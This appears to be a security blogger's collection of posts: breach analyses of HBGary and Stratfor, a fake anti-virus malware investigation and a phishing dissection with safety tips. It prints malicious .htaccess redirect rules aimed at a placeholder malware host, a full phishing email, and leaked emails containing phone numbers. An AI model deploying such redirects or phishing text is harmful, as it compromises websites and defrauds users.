Word Cities Summit 2014 and XRVision

Yaacov Apelbaum - World Cities Summit 2014 Logo

First day of the WCS—against all odds and after two months of grueling development work, an impossible deadline, and 15 hour days—we delivered and deployed the world’s first standalone, wearable face recognition system.

It is my humble hope that this small contribution of ours will help to make our cities, communities, and public gatherings safer.

Yaacov Apelbaum - XRVision Face Recognition System

© Copyright 2014 Yaacov Apelbaum All Rights Reserved.

Cyber Security Poetry

Cyber Beatnic Poetry

Tokens of Distrust
It was on a starless March night,
The spear phishers went out for bite.

Through a zero day vulnerability,
They breached RSA’s network security.

A Trojan attached to an email transmission,
Gave the attackers remote access permission. 

Deep into the corporate systems they dove, 
Collecting the SecureID key seeds treasure trove.

The theft effected over forty million tokens,
Transparency failed and trust was broken.

A few weeks followed and on a moonless May night,
The spear fishers returned with a renewed appetite.

Over the internet via secure VPN and a forged key,
They breached Lockheed’s defenses and Pwned ’their IP.


Ties That Bind
Identity, how do I bind thee to an object? Let me recount the ways. 
One, by a secret.
Two, by a token.
Three, by your essence.
Four, by space and time.


Risk Appetite
A little shiftless fella named Phil,
Landed a CISO gig through a shady deal. 

Clueless about cyber security threats,
He managed his way upwards like a rat.

Pen tests and remediation took a back seat,
To what the cafeteria was serving to eat.


When the company was finally breached by a hack,
He said “C’est la vie! The insurance will cover our back.”

On Privatizing Intelligence Gathering

Yaacov Apelbaum - F18 Instrument Panel Facebook Twitter and YouTube

Much has been said about the military’s effort to incorporate social media platforms into its arsenal of weapons.

Over the past two years, there have been several detailed reports claiming that the armed forces are engaging in large scale social media manipulation initiatives. In his article, “Military’s ‘persona’ software cost millions, used for ‘classified social media activities’”, Stephen Webster provides details about a contract issued by the USAF to develop software that will allow it to create, manage, and operate an army of sock puppets worldwide. In a different article, US Military Caught Manipulating Social Media, Running Mass Propaganda Accounts” Anthony Gucciardi describes how this is done.

The fact that the military is using SN manipulation tools to fight the war is laudable. It’s about time they started using non conventional solutions to carry the war into the back alley Internet cafes where virtual battlefields of radicalization are raging.

The national defense agencies, which are among the most technical and professional organizations out there, are self conscious about the pros and cons of dabbling with SN. The USAF social media guide illustrates these concerns. It offers a detailed analysis and operational recommendations for engaging in SN activity. for example, the global media information flow is shown through the following diagram:

Yaacov Apelbaum - USAF social media Distribution

In another section, the “guidelines to assist Airmen in engaging online conversations” offers a list of the following dos and don’ts:

No Classified Info
Do not post classified or sensitive information (for example, troop movement, force size, weapons details, etc.). If in doubt, talk to your supervisor or security manager.

Replace Error with fact Not Argument
When you see misrepresentations made about the Air Force in social media, you may certainly use your blog, their’s, or someone else’s to point out the error. Always do so with respect and with the facts. When you speak to someone with an adversarial position, make sure that what you say is factual and is not disparaging. Avoid arguments.

Admit Mistakes
Be the first to respond to your own mistakes. If you make an error, be up front about your mistake and correct it quickly. If you choose to modify an earlier post, make it clear that you have done so (such as by using the strikethrough function).

Use Your Best Judgment
Remember there are always consequences to what you write. If you’re still unsure, and the post is about the Air Force, discuss your proposed post with your supervisor. Ultimately, however, you have sole responsibility for what you choose to post to your blog.

Avoid The Offensive
Do not post any defamatory, libelous, vulgar, obscene, abusive, profane, threatening,
racially and ethnically hateful, or otherwise offensive or illegal information or material.

Avoid Copyright
Do not post any information or other material protected by copyright without the permission of the copyright owner.  Also, consider using a Creative Commons license to protect your own work (see
http://creativecommons.org for details).

Trademarks-  Don’t Breach
Do not use any words, logos or other marks that would infringe upon the trademark, service mark, certification mark, or other intellectual property rights of the owners of such marks without the permission of such owners.

Don’t Violate Privacy
Do not post any information that would infringe upon the proprietary, privacy or personal rights of others.

Avoid Endorsements
Do not use the Air Force name to endorse or promote products, opinions or causes.

No Impersonations
Do not forge or otherwise manipulate identifiers in your post in an attempt to disguise, impersonate or otherwise misrepresent your identity or affiliation with any other person or entity.

Use Disclaimers
Identify to readers of a personal social media site or post that the views you express are yours alone and that they do not necessarily reflect the views of the Air Force. Use a disclaimer such as: “The postings on this site are my own and don’t necessarily represent Air Force positions, strategies or opinions.”

Stay In Your Lane
Discussing issues related to your AFSC or personal experiences is acceptable but do not
discuss areas of expertise for which you have no background or knowledge.

Considering the fact that SN bridges numerous EULA and jurisdictional boundaries, it’s likely that these tools will end up violating some privacy laws. But with that having been said, I also have the utmost faith in the military’s ability to regulate and control itself. Between the office of the inspector general, the Uniform Code of Military Justice, and the clear constitutional limitations imposed on the military’s ability to operate on US soil, I think that there are enough checks and balances to prevent wide scale domestic Orwellian style abuse of this technology.

So, what seems to be the problem? Well, the biggest issue is that parts of the SM intelligence collection, monitoring, and analysis are no longer being carried out by the military/three letter government agencies. Rather, it’s being conducted by a horde of private intelligence firms. Some of these include: Palantir, Stratfor, HBGary Federal, Berico Technologies, Endgame Systems, and Booz Allen Hamilton which recently gained notoriety thanks to Edward Snowden’s mega leaks.

A better insight into the functioning of this rent-an-intelligence world of shadows can be gleaned from the hack by LulzSec. In 2010, the group successfully breached the private intelligence firm HBGary/HBGary Federal. The hack captured over 75,000 e-mails. It revealed the close cooperation between large commercial firms such as Bank of America and various government agencies. For example, it showed that BoA solicited the Department of Justice for help regarding possible disclosure by WikiLeaks. The Department of Justice then referred BoA to the political lobby firm Hunton and Willliams, which in turn connected the bank with a group of information security ‘fixers’ known as Team Themis.

Team Themis—a group made up of HBGary Federal and the intelligence firms Palantir Technologies (named after Saruman’s seeing stone in J. R. Tolkien’s Lord of the Rings), Berico Technologies, and Endgame Systems—was consulted regarding ways to destroy the credibility of WikiLeaks and Glenn Greenwald, a Salon.com reporter who wrote favorably about WikiLeaks. The strategy, sought to “sabotage or discredit the opposing organization” and even included a plan to submit fake leaked documents and then call out the error.

Interestingly, some of the leaked documents contained Palantir’s and HBGary’s PowerPoint decks and e-mails which detailed various Machiavellian schemes. A notable example was the strategy for destroying the credibility of Glenn Greenwald.

Yaacov Apelbaum - Palantir presentation about Glenn Greenwald 1

Yaacov Apelbaum - Palantir presentation about Glenn Greenwald 2

Yaacov Apelbaum - Palantir and WikiLeaks

Even more troubling were plans to use malicious software to hack into computers owned by the opponents and their families. The e-mails show a proposal to develop and use “custom malware” and “zero day” exploits to gain control of a target’s computer network in order to snoop their files, delete content, monitor keystrokes, and manipulate websites.

Yaacov Apelbaum - HBGary Exploit Development Services

In one e-mail, a 27 year old Matthew Steckman, a Palantir employee who was central to the Themis operations, boasted:

We are the best money can buy! Damn it feels good to be a gangsta.

It turns out that Palantir, in addition to living the “gangsta” life style  to the fullest was also shooting ‘sideways’ at it’s competitors by allegedly misappropriating IP by fraudulent means and conducting domestic industrial espionage.

The bizarre story revolves around Shyam Sankar, Palantir’s Director of Forward Deployed Engineering who allegedly represented himself as a principal of SRS Enterprises, a straw company registered under the names of his parents in Florida, he and his brother fraudulently obtained i2 competing software solutions and used them to design Palantir’s products.

Yaacov Apelbaum i2 Palantir lawsuit
Image 1: i2 Civil Action Against Palantir

 

Yaacov Apelbaum- S R S Enterprises Llc

Image 2: Company registration Details for SRS

 

Shyam Sankar 
Image 3: Shyam Sankar

Yaacov Apelbaum - Shyam Sankar Palantir

I don’t know if any of these allegations are true because the case was just settled before going to trail, but if even some of details are correct, this is the stuff that spy novels are made out of.

I’m not sure what I find to be more outrages in this case, Palantir’s complete disregard for the law or their nonchalant gangster attitude.

I have no problem rationalizing the military’s proposal to carefully use software like MetalGear to conduct “classified blogging activities on foreign-language Web sites to enable CENTCOM to counter violent extremist and enemy propaganda outside the U.S.”, but Palantir and HBGary were proposing to use such technologies wholesale on US soil for subversive (and most likely illegal) corporate and financial gain.

Several months after the attack against HBGary Federal, Anonymous hacked into another private intelligence firm Stratfor. They released a stash of about five million e-mails which provided deep insight into how the private security/intelligence companies view themselves vis-a-vis government agencies like the C.I.A. and F.B.I.

In one e-mail to his employees, Stratfor chairman arrogantly dismisses the C.I.A.’s capabilities.  He writes:

From: George Friedman [mailto:gfriedman@stratfor.com]
Sent: Wednesday, December 29, 2004 9:13 AM
To: analysts@stratfor.com; exec@stratfor.com
Subject: CIA head of analysis fired

Jamie Miscik, Deputy Director of Intelligence at the CIA was fired today. As
DDI, she ran the analytic shop. According to media reports, she was fired
for squandering resources on day to day reports while ignoring the broad
trends. In other words, she was fired for looking at the trees and being
unable to see the forest. She was also accused of spending too much time
updating policy makers and too little time trying to grasp the broad
trends–giving customers what they wanted instead of what they needed. In
the end, it was her customers that turned on her.
My charge against her was and remains that she took no pride in her craft
and turned intelligence into PR and shoddy process. She and her gang are now
history.

This gives Stratfor an enormous, historic opportunity. The CIA model of
analysis has been invalidated. The ponderous, process driven machine that
could only manage the small things now needs to be replaced by a robust,
visionary, courageous analytic system. Stratfor has the opportunity to show
the way. In fact, we are showing the way. Everyone in Langley knows that we
do things they have never been able to do with a small fraction of their
resources. They have always asked how we did it. We can now show them and
maybe they can learn.

Reading this statement makes you wonder how the C.I.A has ever managed all of these years without Strafor’s robust, visionary, and courageous guidance.

Stratfor Also illustrated their ability to collect deep intelligence by performing private surveillance activities on US soil of protestors in Occupy Austin movement. To achieve this, one of their agents went undercover and joined an Occupy Austin meeting in order to gain insight into how the group operated.

Yet, in another e-mail reveals their ability to gain access to secret government documents. Fred Burton, the Stratfor vice president for Intelligence told one corporate client: “The F.B.I. has a classified investigation [that may be of interest and]…I’ll see what I can uncover.” in similar e-mail, he claims to have access to top secret materials captured during the raid on the OBL [Osama Bin Laden] compound and goes as far as offering a Q&A session regarding it’s content:

From: Fred Burton
To: Secure List
Subject: OBL take — quick response needed
Sent: May 12, 2011 15:25

I can get access to the materials seized from the OBL safe house.
What are the top (not 45) questions we want addressed?

Sean Noonan
Tactical Analyst
Office: +1 512-279-9479
Mobile: +1 512-758-5967
Strategic Forecasting, Inc.
www.stratfor.com

Now, I could understand if Strafor was offering supplementary intel to various government agencies, but the ironic implication here is that they are syphoning classified information from the government and handing it over to their corporate clients.

Indeed, as Morpheus stated, “Fate, it seems, is not without its sense of irony”, Stratfor, the organization that prided itself on teaching the C.I.A a thing or two about security and intelligence gathering got Pwnd through the most benign means.

When you read the details of the Stratfor and HBGary exploits, you can’t help but scratch your head in amazement. For example:

HBGary website failed through a simple SQL injection. The site didn’t scrub nor sanitize any requests. This allowed the attackers to quickly retrieve the site’s User IDs and Passwords.

With a User ID and Password in their possession, they download the entire user database. Next, they proceeded to crack it. If the password database was properly protected, they would have gotten nowhere, but again, poor security design enabled them to retrieve all the passwords. It turns out that the HBGary Federal database stored passwords in simple MD5 hashes. To overcome this, the attackers used readily available rainbow tables.

After getting the passwords of two of HBGary’s executives, Aaron Barr and Ted Vera, they discovered that the passwords only consisted of eight characters: six lower-case letters and two numbers. With the User ID and Password details of the two executives, the attackers found out that this pair reused their passwords in multiple applicaitons, including: e-mail accounts, LinkedIn (see bellow), Twitter and a customer facing server. So now Anonymous was able to access their e-mails too.

Yaacov Apelbaum - HBGary's Aaron Barr Hacked Linkedin
Image 4: Aaron Barr’s 2013 defaced LinkedIn page

Yaacov Apelbaum - HBGary's Aaron Barr Hacked Linkedin-After
Image 5: Aaron Barr’s 2014 updated LinkedIn pages (note the striped personal details and the recommendation by Pulkit Kapila, from Bozz Allen Hamilton

Aaron Barr LinkedIn Page 2018
Image 6: Aaron Barr’s 2018 LinkedIn page

The accounts on the support server belonged to ordinary users but the system wasn’t patched against a privilege elevation attack. Now, with administrative access and due to the fact that one of the executives was also the administrator of the entire e-mail system, Anonymous gained full control of all HBGary Federal e-mail accounts. Using this vulnerability, they gained access to the account of another executive, Greg Hoglund, where they found an e-mail containing the root password for the entire site.

Anonymous had a root password, but couldn’t access the site server from outside of the firewall. They needed to login as a standard user and then switch to root.

To achieve this, they utilized a simple social engineering exploit. Using Greg Hoglund’s account, they contacted an administrator who had root access to the server. Through an e-mail exchange, they said that they had a problem logging in to the server and convinced the root admin to reset Greg’s password and also reveal his username–the two pieces of information they needed to complete their exploit and gain access to the Stratfor list of customers and their credit card files, which interestingly enough, were kept in a plane text file.

This wasn’t unique to HBGary or Strafor. In all hacking cases involving private security or intelligence companies, the analysis of the attack shows that it was executed via the most rudimentary methods. No mission impossible scenarios took place, the root cause was just your common run of the mill information security negligence and incompetence.

Time and time again, these von Wallenstein style wannabe spies have proven themselves to be a legal and an ethical liability. Case in point is that regardless of their patriotic pitch and public assertions of lofty ideals such as “solve the most important problems for the world’s most important institutions”, most of these individuals and companies are bottom feeders who are in it just for a fistful of dollars and narcissistic bragging rights. From the various e-mails disclosed, its obvious that they have no qualms conducting criminal influence operations against their customer’s political opponents and their families on US soil.

image Aaron Barr the Man with the thousand faces
Image 6: Aaron Barr as a Secret Service Agent and other personas

The complete lack of moral scruples from guns for hire, like Aaron Barr, who engaged in the worst type of for-pay defamation doesn’t seem to change with time. Barr—after scrubbing his on-line persona several times—resurfaces in 2015 as a progressive, environmentally friendly activist this time dedicated to promoting Russian collusion theories, climate change awareness, and bemoaning the loss of on-line privacy.

Aaron Barr Promoting Russian Collusion 
image
Image 7: Aaron Barr the champion of transparency and a crusader against Wikileaks

Regardless of how attractive privatizing national security may seem at the moment, ultimately national intelligence should be managed by military and career civil servants that should report to elected officials who in turn should have specific term limits. True, this may not be the best way; after all, J Edgar Hoover managed to abuse the process throughout the terms of six different presidents. But in the end, the system does self-correct. It has been doing that now for over two hundred years.

© Copyright 2013 Yaacov Apelbaum. All Rights Reserved.

The Anti-Virus Virus Part II

Yaacov Apelbaum-ER Anti-Virus Virus

In the Anti-Virus Virus, I described how certain commercially produced malware propagates via specialty web sites that have been SOE’d to rank at the top of search engine results.

In this posting I will try to identify who is responsible for the malware authorship, its marketing and its distribution.

As a quick refresher: the malware, (a variety of bogus anti-virus applications), is downloaded when you click on a link in a page returned by a search engine.  The redirect to the malicious download only occurs when a user arrives at the site by way of the search engine. At the heart of this exploit are legitimate websites that have been compromised to provide a redirect to the rogue downloads.

This exploit is interesting because in order for it to work, it requires the user to visit the site indirectly.  If you navigate to the site via a bookmark or manually enter the address it will not result in a redirect. This clever aspect of the tactic reduces the chance that the site’s owner will suspect that there is something wrong with his site and thus delay its patching. Site administrators visiting their site directly will not see any evidence of the redirect. However, traffic coming from search engines, (which forms the majority of visits) will keep getting redirected to the malware download.

The underlining technique of such an attack is a modification of the .htaccess file (found on the Apache web server). In some cases this file is replaced completely. In others, it is just modified to include some new rules. The modified .htaccess files will contain settings similar to the following:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mroodsn.*$ [NC,OR]
RewriteRule .* http://malewaresite-omitted/ [R=301,L]

This basically means: redirect any users who arrive from Google, Yahoo, MSN to “malewaresite”. In some cases, common error pages are also redirected by the .htaccess file, like in the following:

ErrorDocument 404 http://malewaresite-omitted/

The results of this re-route, is that unsuspecting users get sent to sites pushing malware.

The root cause in most of these cracks is poor user access controls which result in compromised file and folder permissions on shared hosting servers. This allows compromised accounts on the same physical server to overwrite the .htaccess files in otherwise unrelated sites.

Source and Authorship
I loaded Process Monitor and installed the copy of Antivitus2010 on a quarantined Microsoft Virtual PC running Microsoft XP Professional.  The installation created an entire registry hive that included several autoruns, browser search redirects, and a root kit.  I then fired-up TCPView and examined the application’s outgoing communication.  It didn’t take long before the malware opened a socket to a homing beacon and a list of staging and configuration servers, all of which were located in Russia (Moscow and Kiev).  The domains associated with the servers were registered by Bakasoftware.com which is currently hosted in Canada.

Interestingly, upon startup, the malware called the API GetKeyboardLayout checked for the presence of the following keyboard layouts:

  • Russia
  • Czech Republic
  • Ukraine
  • Belarus
  • Estonia
  • Latvia
  • Lithuania

If it found one, it terminated itself, further proof that the designers targeted English users.  The analysis of the binaries also confirmed that they were compiled and linked using Russian regional settings.

Marketing and Distribution
For software to be commercially viable, it must have effective marketing and distribution channels.  The bogus Antivirus is no exception.  It turns out that even a few US companies have been associated with the distribution of this software.  Several of them have been named as defendants in the Federal Trade Commission’s complaint. Some of these include Innovative Marketing, Inc., a US company registered in Belize and ByteHosting Internet Services, LLC of Ohio, in addition to other American distributers including James Reno, Sam Jain, Daniel Sundin, Marc D’Souza, and Kristy Ross.

The Federal Trade Commission argued that the defendants have used complex online advertising techniques that violate the fair trade law in order to push a large number of fake security or system maintenance products including ”WinFixer, WinAntivirus, DriveCleaner, WinAntispyware, ErrorProtector, ErrorSafe, SystemDoctor, AdvancedCleaner, Antivirus XP, and Antivirus 2008, 2009, 2010”.

We can gain a better glimpse into a typical malware distribution operation by examining the profile of Jain Shaileshkumar, a.k.a. Sam Jain. Mr. Jain is an internet entrepreneur and former CEO of the affiliate marketing network eFront. In 2005 he was ordered to pay $3.1 million to Symantec for selling counterfeit software and violating various IP laws. Jain operated several Internet-based companies including Discount Bob, Shifting Currents Financials, Inc., Innovative Marketing, Inc., Professional Management Consulting Inc., and Shopenter.com, LLC.In December 2008, Jain was listed as a defendant in the Federal Trade Commission’s case against so-called “Scareware” applications such as WinFixer. The case alleges that several companies scammed consumers into buying these applications through malware and banner ads.According to court records, as of February 11, 2009. Jain is officially listed as a fugitive from justice in the United States.Affiliate Program

The affiliate program is made up of a network of associates. Once a member the likes of Sam Jain is accepted into the program, he is given access to an enterprise control panel permitting them to distribute different flavors of malware as well as a number of techniques for infecting internet-connected computers. Affiliates can make between 58 to 90 percent commission on sales of the software. Such generous commissions can explain why these types of malware products are so popular among spammers.

Yaacov Apelbaum-Bakasoftware Control Panel 
Image 1: Bakasoftware Malware Administrative Download Control Panel

In a true testament of their feature richness, the affiliate members have access to sophisticated web based statistics dashboard. In it, the franchise owner can view KPIs that include: numbers of daily installs, number purchases by victim (and his CC number), refunds (Chargebacks), and commissions. With such access to real-time sales analytics, they can be the envy of many fortune 500 sales organizations.

Yaacov Apelbaum-Bakasoftware Sales Dashboard  
Table 1: Bakasoftware Malware Sales Dashboard

As you can see from Table 1, one affiliate installed 154,825 editions of the software in 10 days and managed to get 2,772 of those to buy the cure. Any commission sales rep will tell you that a 2% conversation rate is very low, but with such a high commission structure, the affiliate was able to earn $146,525.25. A projection of this earning rate would generate over 5.5 million dollars a year.

That’s some pocket change. Who says that crime doesn’t pay?

© Copyright 2011 Yaacov Apelbaum All Rights Reserved.

The Anti-Virus Virus

Yaacov Apelbaum-Anti-Virus Virus

Several weeks ago, my wife was searching online for the words to one of Shel Silverstein’s poems.  With the Internet within closer reach than the bookshelf in our den, she went to Google and typed in the key words “shel silverstein pancakes,”  and within 0.32 seconds got several matching results (Image 1).

Yaacov Apelbaum-Search Results Page

Image 1: Google Search Results

She clicked on one of the top results on the first search page and almost instantly got prompted by a message box (Image 2) indicating something to the effect that her computer contained various signs of viruses and immediately needed to be examined.  It then offered an option to perform a security scan.

Yaacov Apelbaum-Virus Message 1

Image 2: Infection Warning

We keep our OS well patched and the anti malware software up to date, so she decided to decline the offer and clicked on the cancel button.  The message box went away but then another screen popped up telling her that her system was being scanned for viruses.  Thinking that she may have clicked the OK button instead by mistake, she waited for the scan results.

Yaacov Apelbaum-Virus Scan

Image 3: Infection Warning

When the scan was complete (within 15 seconds or so), she was informed that her computer indeed had been infected with several nasty viruses (Image 3) and that she would need to download and install the offered security program in order to remove these viruses (Image 4).

Yaacov Apelbaum-Virus Download

Image 4: Malware Download Dialog Box

At that point, she realized that malware itself was communicating with her and trying to install itself on her machine.  She clicked the Cancel button dialog box but instead of terminating the installation, she was taken back to the first message box which told her again that her computer contained various signs of viruses and needed to be examined.  Essentially, she was trapped in a loop, unable to close the Browser. After another round of scans and cancelations, she decided to bring up the Task Manager and terminate the process from there.

Several days later during dinner, she happened to mention her run-in with the malware and I made a sly comment that these are the rewards we reap for hanging around dubious websites.  She took offense. “Dubious web sites?” she said, mocking me, “this was the fourth entry on the first search results page of Google. How ‘dubious’ can that be?”

I found it hard to believe that the writers of the malware were clever enough to sneak by the Google filters and make it to the top of the first search results page.  I executed the same search she did just day previous.  My search results were almost identical, but ironically her malware link had by then moved a step upwards in relevance.

Instead of clicking on the link I copied its URL and went directly to the website (Image 5)

Yaacov Apelbaum-Derkeiler.com-3

Image 5: Actual page with download link and keywords

The web site turned out the be a newsgroup called derkeiler.com, which is one of the most popular and most heavily advertised mailing list archives on the net.  Looking closer at the page, I found the following:

  1. At the top was the bold title “SHEL SILVERSTEIN”
  2. Below the title was a bogus poster name in the format of name@xxxxxxxxx.com
  3. Next was a link which activated the malware download script.
  4. Finally at the bottom of the page was an extensive list of hundreds of keywords that were associated with the works of Shel Silverstein.

I looked at the parent directory page and found a long list of dated directories (Image 6).

Yaacov Apelbaum-Derkeiler.com-1

Image 6: Parent Directory (note heavy commercial advertising)

Each one of these directories contained dozens of linked entries. After randomly clicking on about 30 links, I determined that most of them were identical to the Shel Silverstein page (Image 5) in terms of content, layout and malware activation functionality.  I checked out several other public newsgroups and “personal” web sites to compare. It appeared as if indeed there was a method to this madness.

Yaacov Apelbaum-Derkeiler.com-2
Image 6: Sample directory contents with links to malware download

So what does it all mean? Well, the modus operandi seems to be as follows:

  1. The creators of the malware install the program on a large number of personal websites (some have been breached and others are dedicated). One example is Rosuto Samurai which was allegedly created to support fantasy gaming but in reality never had any content beside the malware.
  2. They then proceed to automatically create hundreds of highly popular topic pages (i.e.  Ipod, Shel Silverstein, movies, etc.) in newsgroups and mailing lists, each of which contains a link to the malware download website.
  3. Each of the pages also includes a large list of keywords (generated by some machine learning process) that are associated with the topic.  The purpose of the keyword list is to increase the radar signature for the search engine spiders.
  4. The search engines find these individual topic pages, traverse the keyword list and algorithmically determine that all the words are related.  They also see the hyperlinks and postings on each page (which makes them appear like miniature websites) and as a result assign them a top rating—which to the user, translates as top hits in topic search results.

The outcome of this strategy is cheap and effective SEO penetration and viral dissemination of viral contents (no pun intended) via top search results.

Another interesting observation—which is not without its irony—is that large vendors such as Microsoft are completely unaware of this practice and are aggressively purchasing advertising space on these sites, (including ads for their security products).  Clearly, this is being done without the realization that they are actually sharing living space with some of the most aggressive malware distribution centers.

Stay tuned, in a future posting, we will dive deeper to see who is actually developing and marketing this malware.

Quis Custodiet Ipsos Custodes?

 

© Copyright 2010 Yaacov Apelbaum All Rights Reserved.

Windows Live Credit Card Phishing

Phish

I recently received an email claiming to be from Microsoft Live. The email stated that due to some processing issues, they could not authorize my credit card and so I would need to login to their website to update my credit card information by clicking on their link.

Over the years, I have seen a number of these types of messages, but this was the first one targeting me personally.  After skimming through it, I realized that it was a blatant phishing attempt, nevertheless, I still marveled at the ingenuity of the scammers.

Yaacov Apelbaum-Fake MSN Image

Billing and Account Management

Dear Windows Live Hotmail member,
During our regularly scheduled account maintenance and verification procedures, our billing department was unable to authorize your current payment method information.

This might be due to either of the following reasons:

A recent change in your personal information (i.e. change of address, credit card)

Submitting invalid information during the initial Sign Up or upgrade process.

An inability to accurately verify your selected payment method information due to an internal error within our processors.
Please use the following link to update your payment method information :

http://billing.microsoft.com/logon.srf?action=SignIn&reason=auth&type=auto&uid=187&acct=49472101102

The above link may have been blocked for your privacy. To activate the link please look for the Show content link that is usually located on top of this message.

NOTE! If your account information is not updated within 48 hours then your ability to use your Windows Live Hotmail account will become restricted.

Thank you for using Windows Live Hotmail!
Please do not reply to this e-mail, as this is an unmonitored alias.

Yaacov Apelbaum-Fake Windows Live Image

  © 2009 Microsoft Corporation. All rights reserved.

For the uninitiated, phishing (pronounced “fishing”) is a fraudulent attempt to acquire sensitive information from a user.  Such information can be: credit cards, user IDs, passwords, and/or account information.  It is often accomplished via email or phone

Phishing falls into the category of exploits  known as “social engineering”. Even though they are mostly low tech, (requiring neither sophisticated technology nor advanced programming), they can to be successful (especially the well executed and new exploits) because most people tend instinctively to do what they are told and will not challenge the authority and authenticity of what seems to be an official correspondence.

In a typical phishing scenario, the perpetrators (usually located offshore) send a simple email—claiming to be from the customer service department of a recognizable organization  (like a bank, on-line service, etc.)—the email will inform you of some  problem with your account. You are then instructed to provide details of your bank, email, or credit card account in order to correct this problem.

Even though, phishing exploits can have many variations, they can be grouped into the following are five usage scenarios:

  1. Forged identities — In this exploit, the attacker creates an email address that is related to a reputable organization like “Windows Live Customer Support”. Even though on the surface, their email address looks legitimate (as in: billing@windowslive.com), it is not. If you’re not paying attention, it can be easy to mistake a message like this for a genuine customer support request.
  2. Compromised accounts — In this exploit, the attacker uses a compromised user account to send an email to everyone in the address book for that account. An email you receive from a known account dramatically increases the credibility of that message, and therefore the likelihood of a successful phishing attack.
  3. Direct phone calls — In this exploit, the scammer may contact you directly by phone, telling you that they work for some financial institution (may offer to lower your interest rates) or the fraud investigation departments.  They will inform you that your account has been breached and will directly ask you for your account details in order to verify it.
  4. Bogus websites — In this exploit, the attacker will send you a link to what seems to be a functional website.  The site will include official-looking logos, language, or other identifying information taken directly from a legitimate websites. The address of the site will show resembles the name of a reputable company but with some spelling variations. For example, the name”microsoft.live.com” could appear instead as: “micorsoft.live.com”
  5. Social Network Harvesting — In this exploit, a communication from a scammer will ask you for personal information.  You may mistake it for an email from a friend wanting to reconnect. The email will include convincing details about your personal life which ware recovered from social networks such as LinkedIn, Facebook, etc.

In general, the objective of phishing is to recover your webmail credentials since the resale value of a legitimate web mail account on the black market can be as high as $2-$3—twice the amount they could get for a stolen credit card number.  So for a phisher, breaching several dozens accounts a day can be a lucrative business, making $100K-$500K for the life of the scam.

In the case of my phishing email, when I followed the link in it,  I was taken to a credit card entry form (Image 1). As I expected, the form looked genuine, it had all the right corporate trimmings: a Microsoft logo, copyright notice, and even a link to a help page (which ironically offered the following advice “You should keep this number secret, protect it, and never write it on your card.”)

Yaacov Apelbaum-Phishing Credit Card Form 
Image 1: Phishing Credit Card Entry Form

As with most phishing sites, I was expecting to find some bogus or misspelled Microsoft URL, but instead I was surprised to see that the web address of the webpage actually belonged to a company called Human & Technology H&T (Image 2), clearly, htech21.com doesn’t even sound like Microsoft.  I’ve checked the parent URL out and It turns out, that this company was at one point a legitimate Korean hardware manufacturer, than, two years ago, their CEO was arrested and the company became the target of one of the biggest class-action lawsuits in history.

CEO So what is the connection between htech21.com and this phishing expedition?  It appears that the perpetrators of this scam decided to cut some costs and instead of purchasing and hosting their own domain, they chose to break into the H&T corporate web site and place their credit card collection pages on it.  At one point, our scammers discovered that Human & Technology has gone out of business (this could also have been an inside job) and safely assumed that this orphaned website (which has not been updated for 3 years) is no longer being maintained or monitored, and as such, was a perfect staging platform for a phishing operation.

It is also interesting to note, that the site’s help file focused on ATMs (Automated Teller Machines), strongly suggests that at least some of the phishing website contents have also been used in other scams.

ATM

Yaacov Apelbaum-Human & Technology Phishing Website Korean  Yaacov Apelbaum-Human & Technology Phishing Website English
Image 2: Phishing Host Website

It is hard to recognize legitimate customer service communications from phishing expeditions. This difficulty if further compounded by the fact that for many, using services such as Amazon, EBay, and e-banking has now become a  a way of life.  For most users, the potential inconvenience of being looked out of their favorite on-line services outweighs the risk of disclosing their account information. Unfortunately, the on-line services are not helping this situation either because most are either impossible to reach by phone or their offshore support centers are largely useless.

So how does one survive in the hostile jungle of email exploits? The following are my top 10 Do’s and Don’ts of email:

  • Do Not open emails that have a wrong or incorrect spelling of your name. Phishers often harvest email addresses in balk and may not have your full name. Because of this, they will try to guess your name from your email address.
  • Do Not open emails that are not addressed to you by name. Phishers will almost never personalize correspondences; they will refer to you as “Dear Customer” or “Dear Valued Customer” because they send balk solicitations to millions of email addresses.
  • Do Not respond to any account management email requests that come from your bank. If your bank needs to reach you, they will send you an official letter or leave you a voice mail with a valid callback telephone number.
  • Do Not open unsolicited emails. Nothing in life is free, this includes the invitation to view naked celebrities and the Prozac and Viagra offers in your inbox.
  • Do Not use email links to go to any financial websites. Type in the URL yourself and save it as a bookmark.
  • Do verify the website URL you are about to log into, check the spelling carefully before you provide your login details on any web page.  Pay close attention to domain name following the “http://” section of the address.  Many phishers will Intentionally create very long names to obfuscate the fake URL.
  • Do log in to your on-line accounts regularly and look for unrecognized transactions.  Do the same with your monthly credit card statements.
  • Do Not send your account details via email to anyone.  email traffic is unencrypted, so anyone on route can intercept the message.
  • Do check that the Internet connection you are using is secure. Look for HTTPS in the address field of your browser.  You may also want to click on theEncrypted connection iconpadlock to view the actual server certificate.  This will help you verify that it was issued by a reputable authority and assigned to the company managing the website in question.
  • Do make sure that you have an updated anti-virus software and that your firewall is turned on.

© Copyright 2009 Yaacov Apelbaum All Rights Reserved.

The Financial Advisor

https://apelbaum.wordpress.com/

You can’t miss him. He’s the guy with the freshly pressed $1000 suit, designer silk tie, and imported Italian shoes. His stylish attire is elegantly complemented by an expensive fountain pen, a standard issue Rolex, the latest cell phone, and a brand new luxury car. His physiognomy is unmistakable, styled hair, white teeth, and a nice tan; a modern day Cary Grant.

He’s a natural, standing out at every social gathering—in the fitness club, on the golf course, at church and synagogue. He is jovial and funny, the toast of the party, a real screamer.  Always the first to introduce himself, reaching across the room with a friendly and firm handshake.

He loves sports and works out regularly. Which one is his favorite? Well, he loves them all.  If you let him, he’ll talk to you for hours about the Super Bowel, the NBA, or the US Open.

If sports are not your thing, that’s ok, he’ll talk politics. But don’t get him started! He has an opinion on all matters domestic and foreign, and he’s not afraid to share them with you. He has strong convictions about capitalism, socialism, the government , the environment…you name it.

After just 10 minutes talking with him, you think “Wow, is this guy connected to the hilt!” He just got back from Washington D.C (important meetings with policy makers and various other movers and shakers). And then, there is his story about the White House—and check this out: a wallet sized group photo with the local congressman/senator/governor. And did I mention that he’s on texting terms with several high profile celebrities?

He’s not a loner; he frequently travels with the wolf pack. The lovely spouse is always nearby, ready to lend a hand. She will strategically join the conversation and make a joke or a teasing observation on his account (“Oh, my husband! He is such a Neanderthal. Ha, ha, ha!”),  while your own wife whispers in your ear to check out his adorable son: “He’s only 7! Doesn’t he look mature in his tailored suit!”  The kid, as if suddenly activated by some homing device, makes a B-line towards you for a handshake. “That’s my dad. He’s a financial advisor!” he says proudly.

